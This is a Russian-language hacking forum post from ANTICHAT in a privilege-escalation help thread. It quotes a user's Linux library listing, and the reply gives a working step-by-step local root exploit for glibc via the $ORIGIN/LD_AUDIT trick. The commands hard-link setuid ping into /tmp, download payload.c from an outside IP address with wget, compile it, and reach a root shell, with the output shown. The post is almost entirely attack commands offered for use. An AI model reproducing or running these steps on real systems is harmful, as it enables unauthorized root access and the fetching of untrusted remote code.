ANTICHAT - Показать сообщение отдельно - повышение прав [задай вопрос

Цитата:

Сообщение от vasykas

Linux icpu1521 2.6.28.8-20101130b
-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so

Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:

Код:

$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3 /tmp/exploit/target*
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
$ wget -O /tmp/payload.c http://194.105.208.43/payload.c
$ gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)